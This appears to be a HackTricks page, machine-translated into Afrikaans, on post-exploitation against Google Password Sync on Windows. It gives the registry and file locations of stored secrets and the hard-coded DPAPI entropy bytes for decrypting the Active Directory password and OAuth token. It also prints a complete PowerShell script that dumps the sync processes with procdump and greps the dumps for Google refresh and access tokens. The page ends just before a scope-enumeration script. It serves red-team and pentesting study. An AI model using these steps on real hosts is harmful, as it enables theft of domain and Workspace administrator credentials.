GPS - Google Password Sync

PreviousGCPW - Google Credential Provider for Windows NextGWS - Google Platforms Phishing

Last updated 3 days ago

GPS - Google Password Sync

Leer & oefen AWS Hacking: Leer & oefen GCP Hacking:

Ondersteun HackTricks

Kyk na die !
Sluit aan by die 💬 of die of volg ons op Twitter 🐦 .
Deel hacking truuks deur PRs in te dien na die en github repos.

Basiese Inligting

Dit is die binêre en diens wat Google bied om die wagwoorde van die gebruikers tussen die AD en Workspace gesinkroniseer te hou. Elke keer as 'n gebruiker sy wagwoord in die AD verander, word dit na Google gestel.

Dit word geïnstalleer in C:\Program Files\Google\Password Sync waar jy die binêre PasswordSync.exe kan vind om dit te konfigureer en password_sync_service.exe (die diens wat sal voortgaan om te loop).

GPS - Konfigurasie

Om hierdie binêre (en diens) te konfigureer, is dit nodig om toegang te gee aan 'n Super Admin hoof in Workspace:

Teken in via OAuth met Google en dan sal dit 'n token in die register stoor (geënkripteer)
Slegs beskikbaar in Domein Beheerders met GUI
Gee 'n paar Diensrekening akrediteeringe van GCP (json-lêer) met regte om die Workspace gebruikers te bestuur
Baie slegte idee aangesien daardie akrediteeringe nooit verval nie en misbruik kan word
Baie slegte idee om 'n SA toegang oor workspace te gee aangesien die SA in GCP gecompromitteer kan word en dit moontlik sal wees om na Workspace te pivot
Google vereis dit vir domein beheer sonder GUI
Hierdie akrediteeringe word ook in die register gestoor

Ten opsigte van AD, is dit moontlik om aan te dui om die huidige aansoek konteks, anoniem of 'n spesifieke akreditering te gebruik. As die akreditering opsie gekies word, word die gebruikersnaam in 'n lêer in die skyf gestoor en die wagwoord is geënkripteer en in die register gestoor.

GPS - Dumping wagwoord en token van skyf

In die lêer C:\ProgramData\Google\Google Apps Password Sync\config.xml is dit moontlik om 'n deel van die konfigurasie soos die baseDN van die AD wat geconfigureer is en die gebruikersnaam wie se akrediteringe gebruik word, te vind.

In die register HKLM\Software\Google\Google Apps Password Sync is dit moontlik om die geënkripteerde herlaai token en die geënkripteerde wagwoord vir die AD gebruiker (indien enige) te vind. Boonop, as daar in plaas van 'n token, 'n paar SA akrediteeringe gebruik word, is dit ook moontlik om daardie geënkripteerde in daardie register adres te vind. Die waardes binne hierdie register is slegs toeganklik deur Administrators.

Die geënkripteerde wagwoord (indien enige) is binne die sleutel ADPassword en is geënkripteer met behulp van die CryptProtectData API. Om dit te dekripteer, moet jy dieselfde gebruiker wees as die een wat die wagwoord sinkronisasie geconfigureer het en hierdie entropie gebruik wanneer jy die CryptUnprotectData gebruik: byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };

Die geënkripteerde token (indien enige) is binne die sleutel AuthToken en is geënkripteer met behulp van die CryptProtectData API. Om dit te dekripteer, moet jy dieselfde gebruiker wees as die een wat die wagwoord sinkronisasie geconfigureer het en hierdie entropie gebruik wanneer jy die CryptUnprotectData gebruik: byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b }; Boonop, dit is ook gekodeer met base32hex met die woordeboek 0123456789abcdefghijklmnopqrstv.

Die entropie waardes is gevind deur die hulpmiddel te gebruik. Dit is geconfigureer om die oproepe na CryptUnprotectData en CryptProtectData te monitor en toe is die hulpmiddel gebruik om PasswordSync.exe te begin en te monitor wat die geconfigureerde wagwoord en auth token aan die begin sal dekripteer en die hulpmiddel sal die waardes vir die entropie wat gebruik is in beide gevalle wys:

Let daarop dat dit ook moontlik is om die geënde waardes in die invoer of uitvoer van die oproepe na hierdie API's te sien (in geval Winpeas op 'n stadium stop om te werk).

In die geval dat die Password Sync geconfigureer is met SA akrediteeringe, sal dit ook in sleutels binne die register HKLM\Software\Google\Google Apps Password Sync gestoor word.

GPS - Dumping tokens van geheue

Net soos met GCPW, is dit moontlik om die geheue van die proses van die PasswordSync.exe en die password_sync_service.exe prosesse te dump en jy sal in staat wees om herlaai en toegang tokens te vind (indien hulle reeds gegenereer is). Ek vermoed jy kan ook die AD geconfigureerde akrediteeringe vind.

Dump PasswordSync.exe en die password_sync_service.exe prosesse en soek tokens

```powershell # Define paths for Procdump and Strings utilities $procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe" $stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe" $dumpFolder = "C:\Users\Public\dumps"

Regular expressions for tokens

$tokenRegexes = @( "ya29.[a-zA-Z0-9_.-]{50,}", "1//[a-zA-Z0-9_.-]{50,}" )

Show EULA if it wasn't accepted yet for strings

$stringsPath

Create a directory for the dumps if it doesn't exist

if (!(Test-Path $dumpFolder)) { New-Item -Path $dumpFolder -ItemType Directory }

Get all Chrome process IDs

$processNames = @("PasswordSync", "password_sync_service") $chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name } | Select-Object -ExpandProperty Id

Dump each Chrome process

foreach ($processId in $chromeProcesses) { Write-Output "Dumping process with PID: $processId" & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp" }

Extract strings and search for tokens in each dump

Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object { $dumpFile = $.FullName $baseName = $.BaseName $asciiStringsFile = "$dumpFolder${baseName}_ascii_strings.txt" $unicodeStringsFile = "$dumpFolder${baseName}_unicode_strings.txt"

Write-Output "Extracting strings from $dumpFile" & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile & $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile

$outputFiles = @($asciiStringsFile, $unicodeStringsFile)

foreach ($file in $outputFiles) { foreach ($regex in $tokenRegexes) {

$matches = Select-String -Path $file -Pattern $regex -AllMatches

$uniqueMatches = @{}

foreach ($matchInfo in $matches) { foreach ($match in $matchInfo.Matches) { $matchValue = $match.Value if (-not $uniqueMatches.ContainsKey($matchValue)) { $uniqueMatches[$matchValue] = @{ LineNumber = $matchInfo.LineNumber LineText = $matchInfo.Line.Trim() FilePath = $matchInfo.Path } } } }

foreach ($matchValue in $uniqueMatches.Keys) { $info = $uniqueMatches[$matchValue] Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" } }

Write-Output "" } }

GPS - Scopes

Let daarop dat selfs al het jy 'n hernuwingsteken, dit nie moontlik is om enige omvang vir die toegangsteken aan te vra nie, aangesien jy slegs die omvangs wat deur die toepassing ondersteun word waar jy die toegangsteken genereer kan aan vra.

Ook, die hernuwingsteken is nie geldig in elke toepassing nie.

Standaard sal GPS nie toegang hê as die gebruiker tot elke moontlike OAuth omvang nie, so deur die volgende skrip te gebruik, kan ons die omvangs vind wat met die refresh_token gebruik kan word om 'n access_token te genereer: